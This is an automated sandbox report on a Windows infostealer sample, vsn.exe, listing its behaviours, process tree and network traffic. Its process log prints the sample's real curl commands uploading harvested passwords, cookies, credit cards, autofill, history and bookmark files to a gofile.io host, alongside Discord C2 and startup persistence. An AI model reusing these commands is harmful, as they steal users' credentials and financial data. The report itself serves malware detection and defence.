Malware Analysis Report

2024-11-30 13:32

Sample ID 240604-sxesdsbf3w
Target vsn.exe
SHA256 503d4d7c15290ccb4c4ee4465beb5ec933d56b3936df71e15234cf79266cdc74
Tags
pyinstaller spyware stealer
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

503d4d7c15290ccb4c4ee4465beb5ec933d56b3936df71e15234cf79266cdc74

Threat Level: Shows suspicious behavior

The file vsn.exe was found to be: Shows suspicious behavior.

Malicious Activity Summary

pyinstaller spyware stealer

Drops startup file

Loads dropped DLL

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Unsigned PE

Detects Pyinstaller

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Enumerates processes with tasklist

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Modifies registry class

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-04 15:30

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-04 15:29

Reported

2024-06-04 15:37

Platform

win10v2004-20240508-en

Max time kernel

204s

Max time network

206s

Command Line

"C:\Users\Admin\AppData\Local\Temp\vsn.exe"

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vsn.exe C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1092 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe C:\Users\Admin\AppData\Local\Temp\vsn.exe
PID 1092 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe C:\Users\Admin\AppData\Local\Temp\vsn.exe
PID 3252 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1744 wrote to memory of 380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3252 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe C:\Windows\system32\cmd.exe
PID 3768 wrote to memory of 732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3768 wrote to memory of 732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3252 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe C:\Windows\system32\cmd.exe
PID 4556 wrote to memory of 2188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4556 wrote to memory of 2188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3252 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\vsn.exe C:\Windows\system32\cmd.exe
PID 1340 wrote to memory of 2416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1340 wrote to memory of 2416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 5008 wrote to memory of 2796 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5008 wrote to memory of 2796 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5008 wrote to memory of 2796 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5008 wrote to memory of 2796 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5008 wrote to memory of 2796 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5008 wrote to memory of 2796 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5008 wrote to memory of 2796 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5008 wrote to memory of 2796 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5008 wrote to memory of 2796 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5008 wrote to memory of 2796 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5008 wrote to memory of 2796 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2796 wrote to memory of 100 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\vsn.exe

"C:\Users\Admin\AppData\Local\Temp\vsn.exe"

C:\Users\Admin\AppData\Local\Temp\vsn.exe

"C:\Users\Admin\AppData\Local\Temp\vsn.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3444,i,11266875042087428226,16669718873272757238,262144 --variations-seed-version --mojo-platform-channel-handle=4196 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store9.gofile.io/uploadFile

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.0.85785469\761621078" -parentBuildID 20230214051806 -prefsHandle 1820 -prefMapHandle 1812 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2a51d6c7-dc2f-4bec-9bb5-27fb917a6a64} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 1900 16da571bd58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.1.217440245\431455307" -parentBuildID 20230214051806 -prefsHandle 2456 -prefMapHandle 2452 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48b5d6a5-2b29-475d-b35a-3fdd9e48279a} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 2468 16d9168a558 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.2.919149100\1476227495" -childID 1 -isForBrowser -prefsHandle 2804 -prefMapHandle 2800 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 1312 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2937d454-7d50-4246-bee6-85b5f33c1971} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 2820 16da85f2458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.3.809540272\1610504569" -childID 2 -isForBrowser -prefsHandle 4168 -prefMapHandle 4164 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1312 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba18a779-6d74-4e7c-947c-2155090d88f5} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 4180 16da7ca3a58 tab

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store9.gofile.io/uploadFile

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.4.1846561237\1872670819" -childID 3 -isForBrowser -prefsHandle 5108 -prefMapHandle 5104 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1312 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e70e8d12-0f6c-4905-b6ea-ebe328f9457b} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 5092 16dac10d258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.5.25641054\462858554" -childID 4 -isForBrowser -prefsHandle 5224 -prefMapHandle 4960 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1312 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a532b479-6d0d-4299-b0fd-9b59452029a9} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 5212 16dac784e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.6.1621355902\938376137" -childID 5 -isForBrowser -prefsHandle 5492 -prefMapHandle 5488 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1312 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {23b76e0c-3316-4fdc-b00e-cacf2a10fcc4} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 5408 16dacb57b58 tab

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store9.gofile.io/uploadFile

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.7.384572259\1883265983" -childID 6 -isForBrowser -prefsHandle 5904 -prefMapHandle 5028 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1312 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {09482550-3d96-4d87-b574-841fc499af70} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 5928 16da4ab0e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.8.1564947684\1296863517" -childID 7 -isForBrowser -prefsHandle 10332 -prefMapHandle 9012 -prefsLen 28098 -prefMapSize 235121 -jsInitHandle 1312 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c1bb763b-b10d-4ca0-92b4-922260653cec} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 10316 16dae9e5558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.9.1508509852\520981497" -childID 8 -isForBrowser -prefsHandle 4132 -prefMapHandle 10116 -prefsLen 28177 -prefMapSize 235121 -jsInitHandle 1312 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c310f15a-0a08-40a1-9c56-0dbf2bbe90aa} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 4124 16daeb95658 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.10.1355393945\1714147775" -childID 9 -isForBrowser -prefsHandle 4968 -prefMapHandle 5140 -prefsLen 28186 -prefMapSize 235121 -jsInitHandle 1312 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ff04974-e78a-42d9-99ad-bd606e5bfc3f} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 4568 16daf4afe58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.11.211336402\41225197" -parentBuildID 20230214051806 -prefsHandle 6092 -prefMapHandle 1616 -prefsLen 28186 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {44426678-af6a-4828-a27c-5f0d44587d32} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 9692 16daf7cff58 rdd

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.12.1803910660\150753697" -parentBuildID 20230214051806 -sandboxingKind 1 -prefsHandle 6288 -prefMapHandle 6100 -prefsLen 28186 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b8e132b2-d67f-457d-af08-a5bee411c8bc} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 9676 16daf7d0858 utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.13.499176385\343604967" -childID 10 -isForBrowser -prefsHandle 4764 -prefMapHandle 10024 -prefsLen 28186 -prefMapSize 235121 -jsInitHandle 1312 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d664dc1c-f92f-4301-aa4f-cf8654f38519} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 4672 16daf9de158 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.14.606936079\933331621" -childID 11 -isForBrowser -prefsHandle 9344 -prefMapHandle 4568 -prefsLen 28186 -prefMapSize 235121 -jsInitHandle 1312 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4b47c47-60a3-4dd2-8493-cf83ed7d3494} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 9332 16dafd75958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.15.2054238411\62624127" -childID 12 -isForBrowser -prefsHandle 8800 -prefMapHandle 8760 -prefsLen 28186 -prefMapSize 235121 -jsInitHandle 1312 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {035cf9d1-f8c0-442d-b6bc-3effdd837b4e} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 3524 16db061ed58 tab

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 api.gofile.io udp
FR 51.178.66.33:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
US 8.8.8.8:53 33.66.178.51.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
DE 159.89.102.253:443 geolocation-db.com tcp
BE 2.17.107.105:443 www.bing.com tcp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 105.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 store9.gofile.io udp
US 206.168.190.239:443 store9.gofile.io tcp
US 8.8.8.8:53 discord.com udp
US 8.8.8.8:53 239.190.168.206.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
